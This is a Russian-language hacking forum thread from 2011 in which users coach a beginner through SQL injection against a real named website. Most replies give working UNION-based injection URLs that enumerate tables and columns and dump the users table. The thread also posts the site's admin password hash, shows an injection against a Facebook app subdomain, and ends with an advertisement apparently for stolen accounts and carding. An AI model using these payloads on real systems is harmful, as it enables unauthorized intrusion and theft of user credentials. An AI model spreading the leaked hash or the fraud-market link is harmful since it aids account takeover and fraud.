[Вопрос] SQL-инъекция: Как узнать имена таблиц?
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
[Вопрос] SQL-инъекция: Как узнать имена таблиц? - 2011-07-19 10:19:58.993333
|
|
|
Vasek69
Сообщений: 154
Оценки: 0
Присоединился: 2011-02-12 05:33:39.426666
|
Есть SQL-инъекция по адресу: http://www.position1.ru/index-1.php?id=46. Узнаю database() - http://www.position1.ru/index-1.php?id=-46+union+select+database(),2,3,4,5. Выводит "b60673". Но вот вопрос: Никак не могу понять, как узнать имена таблиц? (я имею ввиду таблицы юзеров и т.п.)
Версия MySQL - 5.0.90.
Я тока учусь, а в Google'е насчет моего вопроса мнения расходятся во всех статьях. Где-то пишут, что тупым подбором типа: *.php?id=-5+union+select+1,2,3,4,5+from+user–? а где-то ещё как-то…
|
|
|
|
|
RE: [Вопрос] SQL-инъекция: Как узнать имена таблиц? - 2011-07-19 10:27:24.570000
|
|
|
ZiMMy
Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000
|
http://www.position1.ru/index-1.php?id=-46+union+select+group_concat(table_name),2,3,4,5+from+information_schema.tables–
|
|
|
|
|
RE: [Вопрос] SQL-инъекция: Как узнать имена таблиц? - 2011-07-19 10:45:05.180000
|
|
|
Vasek69
Сообщений: 154
Оценки: 0
Присоединился: 2011-02-12 05:33:39.426666
|
quote:
http://www.position1.ru/index-1.php?id=-46+union+select+group_concat(table_name),2,3,4,5+from+information_schema.tables–
спс. но вот возьмем таблицу USERS. как узнать её содержимое?
|
|
|
|
|
RE: [Вопрос] SQL-инъекция: Как узнать имена таблиц? - 2011-07-19 10:52:12.850000
|
|
|
Vasek69
Сообщений: 154
Оценки: 0
Присоединился: 2011-02-12 05:33:39.426666
|
ещё вопрос: откуда ты взял это:
http://www.position1.ru/index-1.php?id=-46+union+select+group_concat(table_name),2,3,4,5+from+information_schema.tables–? т.е. group_concat(table_name)
|
|
|
|
|
RE: [Вопрос] SQL-инъекция: Как узнать имена таблиц? - 2011-07-19 11:25:12.080000
|
|
|
ZiMMy
Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000
|
quote:
ORIGINAL: Vasek69
ещё вопрос: откуда ты взял это:
http://www.position1.ru/index-1.php?id=-46+union+select+group_concat(table_name),2,3,4,5+from+information_schema.tables–? т.е. group_concat(table_name)
table_name это имя таблицы, оно хранится в information_schema
group_concat выводит через запятую все выбранные элементы (от limit 0,1 до limit n,1), но не более, вроде бы, тысячи символов.
А вообще, прочитай больше мануалов, и большинство подобных вопросов отпадут.
|
|
|
|
|
RE: [Вопрос] SQL-инъекция: Как узнать имена таблиц? - 2011-07-19 12:54:06.070000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
quote:
Никак не могу понять, как узнать имена таблиц? (я имею ввиду таблицы юзеров и т.п.)
Версия MySQL - 5.0.90.
В 5-ой ветке, как уже сказал ZiMMy, есть такая замечательная вещь как information_schema.tables, где и хранится инфа о табличках.
т.е. запрос
http://www.position1.ru/index-1.php?id=-46+union+select+table_name,2,3,4,5+from+information_schema.tables+limit+17,1–
вернет нам 18-ую табличку "categories"
http://www.position1.ru/index-1.php?id=-46+union+select+table_name,2,3,4,5+from+information_schema.tables+limit+18,1–
19-ую "contents"
Ну и т.д.
PS: первые 17 в данном случае - стандартные, в которых нет ничего интересного.
quote:
Я тока учусь, а в Google'е насчет моего вопроса мнения расходятся во всех статьях. Где-то пишут, что тупым подбором типа: *.php?id=-5+union+select+1,2,3,4,5+from+user–? а где-то ещё как-то…
Так работают с 4-ой веткой.
quote:
спс. но вот возьмем таблицу USERS. как узнать её содержимое?
Берем таблицу USERS, узнаем колонки в ней:
http://www.position1.ru/index-1.php?id=-46+union+select+column_name,2,3,4,5+from+information_schema.columns+where+table_name=0x5553455253+limit+0,1–
http://www.position1.ru/index-1.php?id=-46+union+select+column_name,2,3,4,5+from+information_schema.columns+where+table_name=0x5553455253+limit+1,1–
И т.д., где 0x5553455253 - таблица USERS переведенная в hex.
И составляем запрос
http://www.position1.ru/index-1.php?id=-46+union+select+колонка с таблицы USERS,2,3,4,5+from+users+limit+0,1–
или
http://www.position1.ru/index-1.php?id=-46+union+select+concat(колонка,0x3a,колонка,0x3a,колонка),2,3,4,5+from+users+limit+0,1–
PS: Что такое concat() - http://mysql.ru/docs/man/String_functions.HТМL
quote:
group_concat выводит через запятую все выбранные элементы (от limit 0,1 до limit n,1), но не более, вроде бы, тысячи символов.
Всё верно, 1024 символа. Хотя и это не помеха ;)
|
|
|
|
|
RE: [Вопрос] SQL-инъекция: Как узнать имена таблиц? - 2011-07-19 17:49:46.530000
|
|
|
Vasek69
Сообщений: 154
Оценки: 0
Присоединился: 2011-02-12 05:33:39.426666
|
r1dex, спасибо огромное! Но вот я увидел пароль: cdf38d4724e6c9e539d432fd765ea9cc. Я так понимаю - это MD5? Раскодировал я его на сайте http://md5x.ru, и он выдал мне вот такой пассворд: 1824357dbdb52a2af8aa079cbb39f42a. ИМХО, слишком уж мудреный.
Пока что попробую на другом сайте. гыы
|
|
|
|
|
RE: [Вопрос] SQL-инъекция: Как узнать имена таблиц? - 2011-07-19 17:54:07.553333
|
|
|
Vasek69
Сообщений: 154
Оценки: 0
Присоединился: 2011-02-12 05:33:39.426666
|
кстати, тока что нашел на АНТИЧАТЕ вот такую инъекцию: http://apps.facebook.com/mypersonality/view_reviews.php?rating=1&test_id=10+and(1=0)union(select(1),version(),3,4,5,6,7,8,9,10,11,12,13)–
так-то чё-то я не врубился - это реально facebook?
|
|
|
|
|
RE: [Вопрос] SQL-инъекция: Как узнать имена таблиц? - 2011-07-19 18:37:04.680000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Ну да, только это субдомен фейсбука.
http://apps.facebook.com/mypersonality/view_reviews.php?rating=1&test_id=10+and(1=0)union(select(1),group_concat(field+separator+0x3c62723e),3,4,5,6,7,8,9,10,11,12,13+from+(select+concat(table_name,0x3a,table_rows)+as+field+from+information_schema.tables+limit+50,100)as+t)–
Ничего интересного =)
|
|
|
|
|
RE: [Вопрос] SQL-инъекция: Как узнать имена таблиц? - 2011-07-20 08:44:46.710000
|
|
|
Vasek69
Сообщений: 154
Оценки: 0
Присоединился: 2011-02-12 05:33:39.426666
|
Чтобы узнать все таблицы, мы используем вот это:
http://www.position1.ru/index-1.php?id=-46+union+select+group_concat(table_name),2,3,4,5+from+information_schema.tables-- А как сделать, чтобы все колонки таблицы USERS были видны на одной странице?
|
|
|
|
|
RE: [Вопрос] SQL-инъекция: Как узнать имена таблиц? - 2011-07-20 11:18:25.693333
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
quote:
Чтобы узнать все таблицы, мы используем вот это:
Не все таблицы, а первые 1024 символа, если бы там было бы больше таблиц, то ты бы их не увидел.
Можно убрать стандартные, чтоб не мешались.
http://www.position1.ru/index-1.php
?id=-46+union+select+group_concat(table_name,0x3a,table_rows),2,3,4,5+from+information_schema.tables–
Видим только нестандартные таблицы+кол-во записей в них:
categories:0,contents:27,gallery:10,info:1,menu:6,menu_items:37,users:1
ну можно ещё для вида, так:
http://www.position1.ru/index-1.php
?id=-46+union+select+group_concat(concat(table_name,0x3a,table_rows)separator+0x3c62723e),2,3,4,5+from+information_schema.tables–
С колонками аналогично..
http://www.position1.ru/index-1.php?id=-46+union+select+group_concat(column_name),2,3,4,5+from+information_schema.columns+where+table_name=0x5553455253+limit+0,1–
|
|
|
|
|
RE: [Вопрос] SQL-инъекция: Как узнать имена таблиц? - 2011-07-22 14:26:07.370000
|
|
|
sergey.hudin
Сообщений: 42
Оценки: 0
Присоединился: 2011-06-24 12:41:26.123333
|
вот результат
admin cdf38d4724e6c9e539d432fd765ea9cc
|
|
|
|
|
RE: [Вопрос] SQL-инъекция: Как узнать имена таблиц? - 2011-07-23 04:56:14.690000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Спасибо, кэп, чтобы мы без тебя делали…
|
|
|
|
|
RE: [Вопрос] SQL-инъекция: Как узнать имена таблиц? - 2011-07-23 21:40:15.556666
|
|
|
wekly
Сообщений: 505
Оценки: 0
Присоединился: 2011-07-08 14:35:05.483333
|
Это точно) Подкиньте уязвимостей, а то искать лень:)
|
|
|
|
|
RE: [Вопрос] SQL-инъекция: Как узнать имена таблиц? - 2011-07-24 18:29:49.390000
|
|
|
Vasek69
Сообщений: 154
Оценки: 0
Присоединился: 2011-02-12 05:33:39.426666
|
на античате есть тема: там 2000 страниц уязвимостей. вот она: http://forum.antichat.ru/thread21336.html
|
|
|
|
|
RE: [Вопрос] SQL-инъекция: Как узнать имена таблиц? - 2011-07-24 21:56:15.396666
|
|
|
kuceva
Сообщений: 310
Оценки: 0
Присоединился: 2010-03-16 20:50:37.750000
|
Отличный сайт с раздачами Асек,яда,логов,картона http://goo.gl/Jt4sf
|
|
|
|
|
|
